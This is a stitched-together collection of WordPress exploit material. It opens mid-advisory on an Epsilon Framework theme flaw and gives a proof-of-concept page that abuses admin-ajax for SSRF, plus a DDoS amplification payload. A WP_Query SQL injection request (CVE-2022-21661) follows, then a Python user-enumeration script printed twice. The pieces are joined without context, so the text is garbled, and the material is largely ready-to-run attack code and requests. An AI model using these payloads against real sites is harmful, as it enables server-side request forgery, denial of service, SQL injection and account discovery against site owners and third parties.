$args = $_POST['args']['args'];
$response = $class::$method( $args );
================================================================
Nonce is checked only if it set.
As it is possible to observe, the vulnerability can be exploited if the attacker is able to use a class that contains a public static method that accept an array argument.
Useful methods should be investigated in the context of the targeted website, because they could depend by the installed plugins and themes.
On a wordpress instance, it is possible to store the list of classes containing public static methods by adding this code in epsilon_framework_ajax_action function:
================================================================
function testClasses() {
error_log("[+] IN TEST CLASSES");
mkdir("/tmp/classes");
foreach(get_declared_classes() as $c) {
mylog($c);
$f = fopen('/tmp/classes/'.$c, 'w');
$reflection = new ReflectionClass($c);
$staticMethods = $reflection->getMethods(ReflectionMethod::IS_STATIC);
foreach($staticMethods as $sm) {
mylog($sm);
fwrite($f, $sm . "\n");
}
fclose($f);
}
}
testClasses();
===============================================================
We have found Requests::request_multiple static method(array $requests) in the core of Wordpress that can be used to send arbitrary HTTP requests, with critical dangerous effects for the vulnerable target.
Proof Of Concept:
The following code:
===============================================================
<html>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
$(document).ready(function(){
console.log("document ready");
var ajax_url = "<vulnerable-wordpress-ip>/wp-admin/admin-ajax.php"
var data = {
'action': 'epsilon_framework_ajax_action',
'args': {
'action': ["Requests", "request_multiple"],
'args' : [{"url": "<poc-website>"}]
}
}
$.post(ajax_url, data, function(response) {
console.log("in response")
});
});
</script>
</html>
===============================================================
sends a request to <poc-request>:
==============================================================================================================================
<vulnerable-wordpress-ip>- - [22/Dec/2020:18:36:51 +0000] "GET / HTTP/1.1" 200 3898 "<poc-website>" "php-requests/1.7-3470169"
==============================================================================================================================
Impacts:
1. DDOS amplification against a target: the attacker can exploit vulnerable wordpress sites to send ajax requests with args array containing multiple occurrences of the target. In this way, he can perform an amplification attack against a target website.
var data = {
'action': 'epsilon_framework_ajax_action',
'args': {
'action': ["Requests", "request_multiple"],
'args' : [{"url": "<target>"}, {"url": "<target>"}, {"url": "<target>"}, ...]
}
}
2. SSRF: the attacker can exploit Requests::request_multiple method to perform a Server-Side Request Forgery and obtain access to internal network through vulnerable Wordpress site.
3. Wordpress DoS: if the attacker creates a specific POST request that contains a request to "/wp-admin/admin-ajax.php" as data he could be able to create an internal loop that crashes Wordpress site.
Solution:
In Affected Themes we show the fixed versions.
# Exploit Title: WordPress Core 5.8.2 - 'WP_Query' SQL Injection
# Date: 11/01/2022
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/download/releases
# Version: < 5.8.3
# Tested on: Windows 10
# CVE : CVE-2022-21661
# [ VULNERABILITY DETAILS ] :
#This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core,
#Authentication is not required to exploit this vulnerability, The specific flaw exists within the WP_Query class,
#The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries,
#An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.
# [ References ] :
https://wordpress.org/news/category/releases
https://www.zerodayinitiative.com/advisories/ZDI-22-020
https://hackerone.com/reports/1378209
# [ Sample Request ] :
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Upgrade-Insecure_Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}
# Exploit Title : Wordpress 5.3 - User Disclosure
# Author: SajjadBnd
# Date: 2019-11-17
# Software Link: https://wordpress.org/download/
# version : wp < 5.3
# tested on : Ubunutu 18.04 / python 2.7
# CVE: N/A
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
import requests
import os
import re
import json
import sys
import urllib3
def clear():
linux = 'clear'
windows = 'cls'
os.system([linux, windows][os.name == 'nt'])
def Banner():
print('''
- Wordpress < 5.3 - User Enumeration
- SajjadBnd
''')
def Desc():
url = raw_input('[!] Url >> ')
vuln = url + "/wp-json/wp/v2/users/"
while True:
try:
r = requests.get(vuln,verify=False)
content = json.loads(r.text)
data(content)
except requests.exceptions.MissingSchema:
vuln = "http://" + vuln
def data(content):
for x in content:
name = x["name"].encode('UTF-8')
print("======================")
print("[+] ID : " + str(x["id"]))
print("[+] Name : " + name)
print("[+] User : " + x["slug"])
sys.exit(1)
if __name__ == '__main__':
urllib3.disable_warnings()
reload(sys)
sys.setdefaultencoding('UTF8')
clear()
Banner()
Desc()
wpuser.txt
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Exploit Title : Wordpress < 5.3 - User Disclosure
# Exploit Author: SajjadBnd
# email : blackwolf@post.com
# Software Link: https://wordpress.org/download/
# version : wp < 5.3
# tested on : Ubunutu 18.04 / python 2.7
import requests
import os
import re
import json
import sys
import urllib3
def clear():
linux = 'clear'
windows = 'cls'
os.system([linux, windows][os.name == 'nt'])
def Banner():
print('''
- Wordpress < 5.3 - User Enumeration
- SajjadBnd
''')
def Desc():
url = raw_input('[!] Url >> ')
vuln = url + "/wp-json/wp/v2/users/"
while True:
try:
r = requests.get(vuln,verify=False)
content = json.loads(r.text)
data(content)
except requests.exceptions.MissingSchema:
vuln = "http://" + vuln
def data(content):
for x in content:
name = x["name"].encode('UTF-8')
print("======================")
print("[+] ID : " + str(x["id"]))
print("[+] Name : " + name)
print("[+] User : " + x["slug"])
sys.exit(1)
if __name__ == '__main__':
urllib3.disable_warnings()
reload(sys)
sys.setdefaultencoding('UTF8')
clear()
Banner()
Desc()